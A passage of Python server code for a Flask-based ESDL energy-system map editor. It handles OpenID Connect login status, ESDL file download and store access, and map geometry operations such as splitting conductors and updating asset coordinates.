set_session('user-group', oidc.user_getfield('user_group'))
set_session('user-role', role)
set_session('user-email', user_email)
set_session('user-mapeditor-role', mapeditor_role)
set_session('jwt-token', whole_token)
user_fullname = oidc.user_getfield('name')
set_session('user-fullname', user_fullname)
esdl_store_enabled = not(settings.esdl_store_config["hostname"] is None or settings.esdl_store_config["hostname"] == "")
mondaine_hub_enabled = not(settings.mondaine_hub_config["hostname"] is None or settings.mondaine_hub_config["hostname"] == "")
store_enabled = esdl_store_enabled or mondaine_hub_enabled
esdl_drive_enabled = not(settings.esdl_drive_config["hostname"] is None or settings.esdl_drive_config["hostname"] == "")
edr_enabled = not(settings.edr_config["host"] is None or settings.edr_config["host"] == "")
essim_enabled = not(settings.essim_config["ESSIM_host"] is None or settings.essim_config["ESSIM_host"] == "")
boundary_service_enabled = not(settings.boundaries_config["host"] is None or settings.boundaries_config["host"] == "")
statistics_service_enabled = not(settings.statistics_settings_config["host"] is None or settings.statistics_settings_config["host"] == "")
bag_service_enabled = not(settings.bag_config["host"] is None or settings.bag_config["host"] == "")
ibis_service_enabled = not(settings.ibis_config["host"] is None or settings.ibis_config["host"] == "")
logger.info("store:{} drive:{} edr:{} bound:{} stat:{} bag:{} ibis:{}".format(store_enabled, esdl_drive_enabled,
edr_enabled, boundary_service_enabled, statistics_service_enabled,bag_service_enabled, ibis_service_enabled))
return render_template('editor.html',async_mode=socketio.async_mode,
role=role,
store_enabled=store_enabled,
esdl_drive_enabled=esdl_drive_enabled,
edr_enabled=edr_enabled,
essim_enabled=essim_enabled,
boundary_service_enabled=boundary_service_enabled,
statistics_service_enabled=statistics_service_enabled,
bag_service_enabled=bag_service_enabled,
ibis_service_enabled=ibis_service_enabled,
debug=settings.FLASK_DEBUG,
version=mapeditor_version
)
else:
return render_template('index.html')
# to enable working offline without IDM:
# - comment the @oidc.require_login above this method
# - comment the line above: return render_template('index.html')
# - uncomment the following line:
# return render_template('editor.html', async_mode=socketio.async_mode, role=role)
"""
Checks the OpenID connect session status
And refreshes if necessary?
"""
@app.route('/auth_status')
#@oidc.require_login
def auth_status():
from flask import g
#logger.debug("Global token: {}".format(g.oidc_id_token))
status: Response = oidc.authenticate_or_redirect()
if status is None:
if oidc.user_loggedin:
curr_token = get_session('jwt-token')
if oidc.get_access_token() is not None:
if curr_token is not None and curr_token == oidc.get_access_token():
return {'valid': True, 'reason': "Unchanged"}
else:
logger.info("Refreshed access token for {}".format(oidc.user_getfield('email')))
set_session('jwt-token', oidc.get_access_token())
return {'valid': True, 'reason': "Refreshed"}
else:
# this is the case when we restarted the app, but the browser still has a valid cookie and
# seems still authorized, while the token has not been refreshed or is accessible via oidc.
#if g.oidc_id_token is not None:
# update oidc with session info
#oidc.credentials_store[g.oidc_id_token['sub']] = g.oidc_id_token
#logger.debug("Setting cookie access token ", oidc.get_access_token())
#set_session('jwt-token', oidc.get_access_token())
#return {'valid': True, 'reason': "Updated token"}
g.oidc_id_token = None
oidc.logout()
status: Response = oidc.redirect_to_auth_server('/editor')
uri = status.headers["Location"]
return {'valid': False, 'reason': "Token expired or not available", 'redirect_uri': uri}
else:
oidc.logout()
return {'valid': False, 'reason': "Not logged in"}
else:
status: Response = oidc.redirect_to_auth_server('/editor') # get redirect for /editor, not /auth_status
uri = status.headers["Location"]
return {'valid': False, 'reason': "Authentication required", 'redirect_uri': uri}
# return status # returns a redirect, but that is consumed by the browser because of a 302 status
@app.route('/logout')
def logout():
user_email = get_session('user-email')
user_actions_logging.store_logging(user_email, "logout", "", "", "", {})
"""Performs local logout by removing the session cookie. and does a logout at the IDM"""
oidc.logout()
#This should be done automatically! see issue https://github.com/puiterwijk/flask-oidc/issues/88
return redirect(oidc.client_secrets.get('issuer') + '/protocol/openid-connect/logout?redirect_uri=' + request.host_url)
# Can't figure out why send_file does not work in uWSGI with threading.
# Now we send manually the ESDL as string, which is (probably) not efficient.
# This still works with a 1.6 MB file... Not sure if this scales any further...
@app.route('/esdl')
def download_esdl():
"""Sends the current ESDL file to the browser as an attachment"""
esh = get_handler()
active_es_id = get_session('active_es_id')
try:
#stream = esh.to_bytesio()
my_es = esh.get_energy_system(es_id=active_es_id)
esh.update_version(es_id=active_es_id)
if my_es.esdlVersion is None or my_es.esdlVersion == '':
my_es.esdlVersion = esdl_doc.get_esdl_version()
try:
name = my_es.name
except:
name = my_es.id
if name is None or name == '':
name = "UntitledEnergySystem"
name = '{}.esdl'.format(name)
logger.info('Sending file %s' % name)
user_email = get_session('user-email')
user_actions_logging.store_logging(user_email, "download esdl", name, "", "", {})
content = esh.to_string(es_id=active_es_id)
#wrapped_io = FileWrapper(stream)
#logger.debug(content)
headers = dict()
#headers['Content-Type'] = 'application/esdl+xml'
headers['Content-Disposition'] = 'attachment; filename="{}"'.format(name)
headers['Content-Length'] = len(content)
return Response(content, mimetype='application/esdl+xml', direct_passthrough=True, headers=headers)
#return send_file(stream, as_attachment=True, mimetype='application/esdl+xml', attachment_filename=name)
except Exception as e:
import traceback
traceback.print_exc()
return "Error sending ESDL file, due to {}".format(e)
@app.route('/<path:path>')
def serve_static(path):
# logger.debug('in serve_static(): '+ path)
return send_from_directory('static', path)
# @app.route('/edr_assets')
# def get_edr_assets():
# edr_url = settings.edr_config['EDR_host']+'/store/tagged?tag=asset'
# # logger.debug('accessing URL: '+edr_url)
#
# try:
# r = requests.get(edr_url)
# if r.status_code == 200:
# result = json.loads(r.text)
# asset_list = []
# for a in result:
# asset = {'id': a["id"], 'title': a["title"], 'description': a["description"]}
# asset_list.append(asset)
#
# return (jsonify({'asset_list': asset_list})), 200
# else:
# logger.error('code: ', r.status_code)
# send_alert('Error in getting the EDR assets')
# abort(500, 'Error in getting the EDR assets')
# except Exception as e:
# logger.error('Exception: ')
# logger.error(e)
# send_alert('Error accessing EDR API')
# abort(500, 'Error accessing EDR API')
# ---------------------------------------------------------------------------------------------------------------------
# File I/O and ESDL Store API calls
# ---------------------------------------------------------------------------------------------------------------------
if settings.esdl_store_config is not None and settings.esdl_store_config != "":
default_store_url = settings.esdl_store_config['hostname'] + '/store/'
else:
default_store_url = None
if settings.mondaine_hub_config is not None and settings.mondaine_hub_config != "":
mondaine_hub_url = settings.mondaine_hub_config['hostname'] + '/store/'
else:
mondaine_hub_url = None
def create_ESDL_store_item(id, esh, title, description, email):
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url
else:
store_url = default_store_url
if store_url:
esdlstr = esh.to_string()
try:
payload = {'id': id, 'title': title, 'description': description, 'email':email, 'esdl': esdlstr}
requests.post(store_url, data=payload)
except Exception as e:
send_alert('Error accessing ESDL store:' + str(e))
def load_ESDL_EnergySystem(store_id):
store_item = load_store_item(store_id)
if store_item:
esdlstr = store_item['esdl']
del store_item['esdl']
set_session('store_item_metadata', store_item)
emit('store_item_metadata', store_item)
try:
esh = get_handler()
es, parse_info = esh.load_from_string(esdl_string=esdlstr, name=store_item['title'])
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(store_item['title'], info))
return esh
except Exception as e:
send_alert('Error interpreting ESDL file from store: ' + str(e))
return None
else:
return None
def import_ESDL_EnergySystem(store_id):
store_item = load_store_item(store_id)
if store_item:
esdlstr = store_item['esdl']
del store_item['esdl']
set_session('store_item_metadata', store_item)
emit('store_item_metadata', store_item)
try:
esh = get_handler()
imported_es, parse_info = esh.add_from_string(esdl_string=esdlstr, name=store_item['title'])
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(store_item['title'], info))
return imported_es
except Exception as e:
send_alert('Error interpreting ESDL file from store: ' + str(e))
return None
else:
return None
def load_store_item(store_id):
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url
else:
store_url = default_store_url
if store_url:
url = store_url + store_id + '?format=xml'
try:
r = requests.get(url)
except Exception as e:
send_alert('Error accessing ESDL store:' + str(e))
return None
if r.status_code == 200:
result = json.loads(r.text)
if len(result) > 0:
return result
else:
return None
else:
logger.error('Accessing store return status: '+str(r.status_code))
send_alert('Error accessing ESDL store:' + str(r))
return None
else:
return None
def update_store_item(store_id, title, descr, email, tags, esh):
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url
else:
store_url = default_store_url
if store_url:
esdlstr = esh.to_string()
payload = {'id': store_id, 'title': title, 'description': descr, 'email': email, 'tags': tags, 'esdl': esdlstr}
try:
requests.put(store_url + store_id, data=payload)
except Exception as e:
send_alert('Error saving ESDL file to store: ' + str(e))
def create_new_store_item(store_id, title, descr, email, tags, esh):
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url
else:
store_url = default_store_url
if store_url:
esdlstr = esh.to_string()
payload = {'id': store_id, 'title': title, 'description': descr, 'email': email, 'tags': tags, 'esdl': esdlstr}
try:
r = requests.post(store_url, data=payload)
except Exception as e:
send_alert('Error saving ESDL file to store: ' + str(e))
if r.status_code != 201:
send_alert('Error saving ESDL file to store. Error code: ' + str(r.status_code))
# ---------------------------------------------------------------------------------------------------------------------
# parse the ESDL config file
# ---------------------------------------------------------------------------------------------------------------------
def parse_esdl_config():
esdlc = esdl_config.esdl_config
logger.info('Configuration found: {}'.format(esdlc))
# ---------------------------------------------------------------------------------------------------------------------
# Send alert to client UI
# ---------------------------------------------------------------------------------------------------------------------
def send_alert(message):
logger.warning(message)
emit('alert', message, namespace='/esdl')
# FIXME: pyecore
def _set_carrier_for_connected_transport_assets(asset_id, carrier_id, processed_assets):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
processed_assets.append(asset_id)
port_list = []
for p in asset.port:
p.carrier = esh.get_by_id(active_es_id, carrier_id) #FIXME pyecore
conn_to = p.connectedTo
if conn_to:
for conn_port in conn_to:
conn_asset = get_asset_from_port_id(esh, active_es_id, conn_port.id)
if isinstance(conn_asset, esdl.Transport) and not isinstance(conn_asset, esdl.HeatExchange) \
and not isinstance(conn_asset, esdl.Transformer):
if conn_asset.id not in processed_assets:
_set_carrier_for_connected_transport_assets(conn_asset.id, carrier_id, processed_assets)
else:
conn_asset_port_list = []
for conn_asset_port in conn_asset.port:
if conn_asset_port.id == conn_port.id:
conn_asset_port.carrier = p.carrier
for conn_to_same_port in conn_asset_port.connectedTo:
if conn_to_same_port.id != p.id: # don't traverse back to the original port (compare ids by value, not identity)
conn_to_same_port_asset = get_asset_from_port_id(esh, active_es_id, conn_to_same_port.id)
if conn_to_same_port_asset.id not in processed_assets:
_set_carrier_for_connected_transport_assets(conn_to_same_port_asset.id, carrier_id, processed_assets)
conn_asset_port_list.append({'name': conn_asset_port.name, 'id': conn_asset_port.id,
'type': type(conn_asset_port).__name__, 'conn_to': [pt.id for pt in conn_asset_port.connectedTo],
'carrier': conn_asset_port.carrier.id if conn_asset_port.carrier else None})
# also update the ports of the 'leaf' asset (recursion stops here)
emit('update_asset', {'asset_id': conn_asset.id, 'ports': conn_asset_port_list})
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo], 'carrier': p.carrier.id if p.carrier else None})
# update the asset ports in the gui, if the carrier has changed.
emit('update_asset', {'asset_id': asset.id, 'ports': port_list})
def set_carrier_for_connected_transport_assets(asset_id, carrier_id):
processed_assets = [] # List of asset_id's that are processed
_set_carrier_for_connected_transport_assets(asset_id, carrier_id, processed_assets)
# logger.debug(processed_assets)
# ---------------------------------------------------------------------------------------------------------------------
# Build up initial information about energysystem to send to browser
# ---------------------------------------------------------------------------------------------------------------------
def generate_point_in_area(boundary):
# placeholder, not implemented yet
return
def update_building_asset_geometries(building, avail_locations):
for basset in building.asset:
if isinstance(basset, esdl.EnergyAsset):
geom = basset.geometry
if not geom:
location = avail_locations.pop(0)
geom = esdl.Point(lon=location[1], lat=location[0])
basset.geometry = geom
def update_area_asset_geometries(area, avail_locations):
# process subareas
for ar in area.area:
update_area_asset_geometries(ar, avail_locations)
# process assets in area
for asset in area.asset:
if isinstance(asset, esdl.AbstractBuilding):
update_building_asset_geometries(asset, avail_locations)
if isinstance(asset, esdl.EnergyAsset):
geom = asset.geometry
if not geom:
location = avail_locations.pop(0)
geom = esdl.Point(lon=location[1], lat=location[0])
asset.geometry = geom
def count_building_assets_and_potentials(building):
# TODO: Error: BuildingUnits are taken into account
# TODO: add potentials
num = len(building.asset)
for basset in building.asset:
if isinstance(basset, esdl.AbstractBuilding):
num += count_building_assets_and_potentials(basset)
return num
def count_assets_and_potentials(area):
num = len(area.asset)
num += len(area.potential)
for ar_asset in area.asset:
if isinstance(ar_asset, esdl.AbstractBuilding):
num += count_building_assets_and_potentials(ar_asset)
for ar in area.area:
num += count_assets_and_potentials(ar)
return num
def calculate_triangle_center(triangle):
sumx = triangle[0][0] + triangle[1][0] + triangle[2][0]
sumy = triangle[0][1] + triangle[1][1] + triangle[2][1]
center_coord = [sumx / 3, sumy / 3]
return center_coord
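# Worked example (a sketch): for triangle [[0, 0], [3, 0], [0, 3]] the centroid is
# [(0 + 3 + 0) / 3, (0 + 0 + 3) / 3] = [1.0, 1.0].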
def get_control_strategy_info(asset):
control_strategy = asset.controlStrategy
if control_strategy:
cs_info = {
'id': control_strategy.id,
'name': control_strategy.name,
'type': type(control_strategy).__name__
}
if isinstance(control_strategy, esdl.DrivenByDemand):
if control_strategy.outPort:
cs_info['out_port_id'] = control_strategy.outPort.id
if isinstance(control_strategy, esdl.DrivenBySupply):
if control_strategy.inPort:
cs_info['in_port_id'] = control_strategy.inPort.id
if isinstance(control_strategy, esdl.DrivenByProfile):
if control_strategy.port:
cs_info['port_id'] = control_strategy.port.id
if control_strategy.profile:
cs_info['profile_id'] = control_strategy.profile.id
if isinstance(control_strategy, esdl.StorageStrategy):
mcc, mdc = get_storage_marginal_costs(asset.id)
cs_info['marginal_charge_costs'] = mcc
cs_info['marginal_discharge_costs'] = mdc
if isinstance(control_strategy, esdl.CurtailmentStrategy):
cs_info['max_power'] = control_strategy.maxPower
if isinstance(control_strategy, esdl.PIDController):
cs_info['kp'] = control_strategy.Kp
cs_info['ki'] = control_strategy.Ki
cs_info['kd'] = control_strategy.Kd
return cs_info
else:
return {}
def add_bld_to_area_bld_list(bld_to_add, to_area_or_bld_id, ab_list):
# area_bld_list.append(['Building', building.id, building.name, level])
for idx, rcv_ab in enumerate(ab_list):
if rcv_ab[1] == to_area_or_bld_id:
ab_list.insert(idx+1, ['Building', bld_to_add.id, bld_to_add.name, rcv_ab[3] + 1])
def add_area_to_area_bld_list(area_to_add, to_area_id, ab_list):
# area_bld_list.append(['Area', area.id, area.name, level])
for idx, rcv_ab in enumerate(ab_list):
if rcv_ab[1] == to_area_id:
ab_list.insert(idx+1, ['Area', area_to_add.id, area_to_add.name, rcv_ab[3] + 1])
def remove_ab_from_area_bld_list(ab_id, ab_list):
for idx, ab in enumerate(ab_list):
if ab[1] == ab_id:
ab_list.pop(idx)
return
# TODO: Not used now, should we keep the conn_list updated? --> Yes, now we do! For redrawing when selecting carriers
# 13-1-2020: Commented out: energycarrier info for port not added yet because function is not used at the moment.
#def add_connection_to_list(conn_list, from_port_id, from_asset_id, from_asset_coord, to_port_id, to_asset_id, to_asset_coord):
# conn_list.append(
# {'from-port-id': from_port_id, 'from-asset-id': from_asset_id, 'from-asset-coord': from_asset_coord,
# 'to-port-id': to_port_id, 'to-asset-id': to_asset_id, 'to-asset-coord': to_asset_coord})
def update_asset_connection_locations(ass_id, lat, lon):
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
for c in conn_list:
if c['from-asset-id'] == ass_id:
c['from-asset-coord'] = (lat, lon)
if c['to-asset-id'] == ass_id:
c['to-asset-coord'] = (lat, lon)
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
def update_transport_connection_locations(ass_id, asset, coords):
active_es_id = get_session('active_es_id')
esh = get_handler()
conn_list = get_session_for_esid(active_es_id, 'conn_list')
# logger.debug('Updating locations')
for c in conn_list:
if c['from-asset-id'] == ass_id:
port_id = c['from-port-id']
port_ass_map = get_asset_and_coord_from_port_id(esh, active_es_id, port_id)
c['from-asset-coord'] = port_ass_map['coord']
if c['to-asset-id'] == ass_id:
port_id = c['to-port-id']
port_ass_map = get_asset_and_coord_from_port_id(esh, active_es_id, port_id)
c['to-asset-coord'] = port_ass_map['coord']
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
def update_polygon_asset_connection_locations(ass_id, coords):
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
for c in conn_list:
if c['from-asset-id'] == ass_id:
c['from-asset-coord'] = coords
if c['to-asset-id'] == ass_id:
c['to-asset-coord'] = coords
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
set_session_for_esid(active_es_id, 'conn_list', conn_list)
# ---------------------------------------------------------------------------------------------------------------------
# Create connections between assets
# ---------------------------------------------------------------------------------------------------------------------
def connect_ports(port1, port2):
port1.connectedTo.append(port2)
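# Note (assumption): with pyecore, if connectedTo is modelled as a bidirectional (eOpposite)
# reference, appending port2 to port1.connectedTo also registers the reverse link; elsewhere
# (e.g. in split_conductor below) both directions are appended explicitly.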
def split_conductor(conductor, location, mode, conductor_container):
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
esh = get_handler()
geometry = conductor.geometry
conductor_type = type(conductor).__name__
conductor_id = conductor.id
middle_point = esdl.Point(lat=location['lat'], lon=location['lng']) #no elevation?
if isinstance(geometry, esdl.Line):
# create two separate line segments
line1 = esdl.Line()
line2 = esdl.Line()
#find piece of line where user clicked
points = geometry.point
begin_point = points[0]
first_point = points[0] # make an additional copy
# Ewoud: this code is not so nice since it manipulates the original geometry.point with points.pop(0) later on
# this should be fixed, but not now (no time)
# pyEcore: somehow using points[0] does something strange in the serialization to XML
# instead of <point xsi:type="esdl:Point"> you get <esdl:Point lat=...> which is wrong
# duplicating this point manually fixes this, probably because there is a reference to this point
# elsewhere which gets serialized as an <esdl:Point>
# officially we should duplicate all Point in this code
line1.point.append(esdl.Point(lat=begin_point.lat, lon=begin_point.lon, elevation=begin_point.elevation))
points.pop(0)
min_dist = 1e99
segm_ctr = 0
min_dist_segm = 0
for point in points:
p1 = {'x': begin_point.lat, 'y': begin_point.lon}
p2 = {'x': point.lat, 'y': point.lon}
p = {'x': location['lat'], 'y': location['lng']}
dist = ESDLGeometry.distance_point_to_line(p, p1, p2)
if dist < min_dist:
min_dist = dist
min_dist_segm = segm_ctr
begin_point = point
segm_ctr += 1
# copy appropriate points in original conductor to either line1 or line2
points = geometry.point
segm_ctr = 0
logger.debug('segment min = {}'.format(min_dist_segm))
for point in list(points):
if segm_ctr == min_dist_segm:
new_point = esdl.Point(lon=middle_point.lon, lat=middle_point.lat, elevation=middle_point.elevation)
line1.point.append(new_point)
line2.point.append(new_point.clone())
if segm_ctr < min_dist_segm:
line1.point.append(point)
else:
line2.point.append(point)
segm_ctr += 1
# find old ports and connections
ports = conductor.port
if len(ports) != 2:
send_alert('UNSUPPORTED: Conductor doesn\'t have two ports!')
return
port1 = ports[0] # reuse old conductor's ports; TODO: check what happens after deleting conductor
port2 = ports[1]
new_cond1_id = str(uuid.uuid4())
new_cond2_id = str(uuid.uuid4())
new_port1_id = str(uuid.uuid4())
new_port2_id = str(uuid.uuid4())
# create two conductors of the same type as the conductor being split, by duplicating the original
# e.g. also copy over the pipe material
new_cond1 = conductor.deepcopy()
new_cond2 = conductor.deepcopy()
if new_cond1.name == new_cond1.eClass.name + '_' + new_cond1.id[:4]:
new_cond1.name = new_cond1.eClass.name + '_' + new_cond1_id[:4]
new_cond2.name = new_cond2.eClass.name + '_' + new_cond2_id[:4]
else:
new_cond2.name = new_cond1.name + '_b'
new_cond1.name = new_cond1.name + '_a'
new_cond1.id = new_cond1_id
new_cond1.port.clear() # remove existing port, as we add previous used ports later
new_cond2.id = new_cond2_id
new_cond2.port.clear()
esh.add_object_to_dict(active_es_id, new_cond1)
esh.add_object_to_dict(active_es_id, new_cond2)
if type(port1).__name__ == "InPort":
new_port2 = esdl.OutPort(id=new_port2_id, name='Out')
else:
new_port2 = esdl.InPort(id=new_port2_id, name='In')
new_cond1.port.append(port1)
new_cond1.port.append(new_port2)
if type(port2).__name__ == "InPort":
new_port1 = esdl.OutPort(id=new_port1_id, name='Out')
else:
new_port1 = esdl.InPort(id=new_port1_id, name='In')
if mode == 'connect':
new_port1.connectedTo.append(new_port2)
new_port2.connectedTo.append(new_port1)
new_cond2.port.append(new_port1)
new_cond2.port.append(port2)
esh.add_object_to_dict(active_es_id, new_port1)
esh.add_object_to_dict(active_es_id, new_port2)
# calculate line lengths
start = line1.point[0]
length = 0
for i in range(1, len(line1.point)):
length += ESDLGeometry.distance((start.lat, start.lon), (line1.point[i].lat, line1.point[i].lon)) * 1000
start = line1.point[i]
new_cond1.length = round(length, 2)
start = line2.point[0]
length = 0
for i in range(1, len(line2.point)):
length += ESDLGeometry.distance((start.lat, start.lon), (line2.point[i].lat, line2.point[i].lon)) * 1000
start = line2.point[i]
new_cond2.length = round(length, 2)
logger.debug('split-conductor: line1 length={}, line2 length={}'.format(new_cond1.length, new_cond2.length))
# assign line geometry to the correct conductor
new_cond1.geometry = line1
new_cond2.geometry = line2
# remove conductor from container (area or building) and add new two conductors
assets = conductor_container.asset
assets.remove(conductor)
esh.remove_object_from_dict(active_es_id, conductor)
conductor_container.asset.append(new_cond1)
conductor_container.asset.append(new_cond2)
# create list of ESDL assets to be added to UI
esdl_assets_to_be_added = []
coords1 = []
for point in line1.point:
coords1.append([point.lat, point.lon])
port_list = []
carrier = None
if port1.carrier: carrier = port1.carrier
if port2.carrier: carrier = port2.carrier
carrier_id = carrier.id if carrier is not None else None
for p in new_cond1.port:
p.carrier = carrier
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
                          'conn_to': [pt.id for pt in p.connectedTo], 'carrier': carrier_id})
state = asset_state_to_ui(new_cond1)
tooltip_asset_attrs = get_tooltip_asset_attrs(new_cond1, 'line')
add_spatial_attributes(new_cond1, tooltip_asset_attrs)
esdl_assets_to_be_added.append(['line', 'asset', new_cond1.name, new_cond1.id, type(new_cond1).__name__,
coords1, tooltip_asset_attrs, state, port_list])
coords2 = []
for point in line2.point:
coords2.append([point.lat, point.lon])
port_list = []
for p in new_cond2.port:
p.carrier = carrier
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
                          'conn_to': [pt.id for pt in p.connectedTo], 'carrier': carrier_id})
state = asset_state_to_ui(new_cond2)
tooltip_asset_attrs = get_tooltip_asset_attrs(new_cond2, 'line')
add_spatial_attributes(new_cond2, tooltip_asset_attrs)
esdl_assets_to_be_added.append(['line', 'asset', new_cond2.name, new_cond2.id, type(new_cond2).__name__,
coords2, tooltip_asset_attrs, state, port_list])
# update asset id's of conductor with new_cond1 and new_cond2 in conn_list
for c in conn_list:
if c['from-asset-id'] == conductor_id and c['from-port-id'] == port1.id:
c['from-asset-id'] = new_cond1_id
if c['from-asset-id'] == conductor_id and c['from-port-id'] == port2.id:
c['from-asset-id'] = new_cond2_id
if c['to-asset-id'] == conductor_id and c['to-port-id'] == port1.id:
c['to-asset-id'] = new_cond1_id
if c['to-asset-id'] == conductor_id and c['to-port-id'] == port2.id:
c['to-asset-id'] = new_cond2_id
# create list of connections to be added to UI
if mode == 'connect':
conn_list.append({'from-port-id': new_port2_id, 'from-port-carrier': carrier_id,
'from-asset-id': new_cond1_id, 'from-asset-coord': (middle_point.lat, middle_point.lon),
'to-port-id': new_port1_id, 'to-port-carrier': carrier_id, 'to-asset-id': new_cond2_id,
'to-asset-coord': (middle_point.lat, middle_point.lon)})
if mode == 'add_joint':
joint_id = str(uuid.uuid4())
joint = esdl.Joint(id=joint_id, name='Joint_'+joint_id[:4])
inp = esdl.InPort(id=str(uuid.uuid4()), name='In')
outp = esdl.OutPort(id=str(uuid.uuid4()), name='Out')
if carrier:
inp.carrier = carrier
outp.carrier = carrier
if type(new_port2).__name__ == "OutPort":
inp.connectedTo.append(new_port2)
new_port2_conn_to_id = inp.id
else:
outp.connectedTo.append(new_port2)
new_port2_conn_to_id = outp.id
if type(new_port1).__name__ == "InPort":
outp.connectedTo.append(new_port1)
new_port1_conn_to_id = outp.id
else:
inp.connectedTo.append(new_port1)
new_port1_conn_to_id = inp.id
joint.port.append(inp)
joint.port.append(outp)
joint.geometry = middle_point
conductor_container.asset.append(joint)
esh.add_object_to_dict(active_es_id, joint)
esh.add_object_to_dict(active_es_id, inp)
esh.add_object_to_dict(active_es_id, outp)
port_list = []
for p in joint.port:
p.carrier = carrier
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
                              'conn_to': [pt.id for pt in p.connectedTo], 'carrier': carrier_id})
capability_type = ESDLAsset.get_asset_capability_type(joint)
state = asset_state_to_ui(joint)
tooltip_asset_attrs = get_tooltip_asset_attrs(joint, 'marker')
esdl_assets_to_be_added.append(['point', 'asset', joint.name, joint.id, type(joint).__name__,
[middle_point.lat, middle_point.lon], tooltip_asset_attrs, state, port_list,
capability_type])
conn_list.append({'from-port-id': new_port2_id, 'from-port-carrier': carrier_id,
'from-asset-id': new_cond1_id, 'from-asset-coord': (middle_point.lat, middle_point.lon),
'to-port-id': new_port2_conn_to_id, 'to-port-carrier': carrier_id,
'to-asset-id': joint.id, 'to-asset-coord': (middle_point.lat, middle_point.lon)})
conn_list.append({'from-port-id': new_port1_conn_to_id, 'from-port-carrier': carrier_id,
'from-asset-id': joint.id, 'from-asset-coord': (middle_point.lat, middle_point.lon),
'to-port-id': new_port1_id, 'to-port-carrier': carrier_id,
'to-asset-id': new_cond2_id, 'to-asset-coord': (middle_point.lat, middle_point.lon)})
# now send new objects to UI
emit('add_esdl_objects', {'es_id': active_es_id, 'asset_pot_list': esdl_assets_to_be_added, 'zoom': False})
emit('clear_connections') # clear current active layer connections
        emit('delete_esdl_object', {'asset_id': conductor.id})  # remove original conductor from map
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
else:
send_alert('UNSUPPORTED: Conductor is not of type esdl.Line!')
# ---------------------------------------------------------------------------------------------------------------------
# Update ESDL coordinates on movement of assets in browser
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on('update-coord', namespace='/esdl')
def update_coordinates(message):
# This function can also be called when the geometry of an asset is of type esdl.Polygon, because
# the asset on the leaflet map is both represented as a Polygon and a Point (to connect, to attach menus)
active_es_id = get_session('active_es_id')
esh = get_handler()
obj_id = message['id']
coords = message['coordinates']
object = esh.get_by_id(active_es_id, obj_id)
# object can be an EnergyAsset, Building, Potential or Note
if object:
if isinstance(object, esdl.Note):
geom = object.mapLocation
else:
geom = object.geometry
if isinstance(geom, esdl.Point):
point = esdl.Point(lon=float(coords['lng']), lat=float(coords['lat']))
if isinstance(object, esdl.Note):
object.mapLocation = point
else:
object.geometry = point
# elif isinstance(geom, esdl.Polygon):
# Do nothing in case of a polygon
# only update the connection locations and mappings based on the center of the polygon
# that is given as a parameter.
# update coordinates in asset_list
asset_list = get_session_for_esid(active_es_id, 'asset_list')
for a in asset_list:
if a[3] == obj_id:
a[5] = [coords['lat'], coords['lng']]
                break  # done searching
if isinstance(object, (esdl.EnergyAsset, esdl.AbstractBuilding)):
# Update locations of connections on moving assets
update_asset_connection_locations(obj_id, coords['lat'], coords['lng'])
# TODO: Check if this is still required
if message['asspot'] == 'building':
send_alert("Assets in building with locations are not updated yet")
@socketio.on('update-line-coord', namespace='/esdl')
def update_line_coordinates(message):
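    """Update the Line geometry and length of an asset after its polyline was edited in the browser."""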
# logger.debug ('received polyline: ' + str(message['id']) + ':' + str(message['polyline']))
ass_id = message['id']
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, ass_id)
if asset:
ports = asset.port
polyline_data = message['polyline']
# logger.debug(polyline_data)
# logger.debug(type(polyline_data))
polyline_length = float(message['length'])
asset.length = polyline_length
line = esdl.Line()
for i in range(0, len(polyline_data)):
coord = polyline_data[i]
point = esdl.Point(lon=coord['lng'], lat=coord['lat'])
line.point.append(point)
asset.geometry = line
# update coordinates in asset_list
asset_list = get_session_for_esid(active_es_id, 'asset_list')
for a in asset_list:
if a[3] == ass_id:
a[5] = [(coord['lat'], coord['lng']) for coord in polyline_data]
                break  # done searching
update_transport_connection_locations(ass_id, asset, polyline_data)
@socketio.on('update-polygon-coord', namespace='/esdl')
def update_polygon_coordinates(message):
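    """Update the Polygon geometry and surfaceArea of an asset after its polygon was edited in the browser."""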
# logger.debug ('received polygon: ' + str(message['id']) + ':' + str(message['polygon']))
ass_id = message['id']
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, ass_id)
if asset:
polygon_data = message['polygon']
# logger.debug(polygon_data)
# logger.debug(type(polygon_data))
polygon_area = int(message['polygon_area'])
asset.surfaceArea = polygon_area
polygon_data = ESDLGeometry.remove_duplicates_in_polygon(polygon_data)
polygon_data = ESDLGeometry.remove_latlng_annotation_in_array_of_arrays(polygon_data)
polygon_data = ESDLGeometry.exchange_polygon_coordinates(polygon_data) # --> [lon, lat]
polygon = ESDLGeometry.convert_pcoordinates_into_polygon(polygon_data) # expects [lon, lat]
asset.geometry = polygon
polygon_center = ESDLGeometry.calculate_polygon_center(polygon)
update_polygon_asset_connection_locations(ass_id, polygon_center)
# ---------------------------------------------------------------------------------------------------------------------
# Control Strategies
# ---------------------------------------------------------------------------------------------------------------------
def get_control_strategies(es):
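    """Return all ControlStrategy services defined in the energy system's Services section."""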
strategies = []
services = es.services
if services:
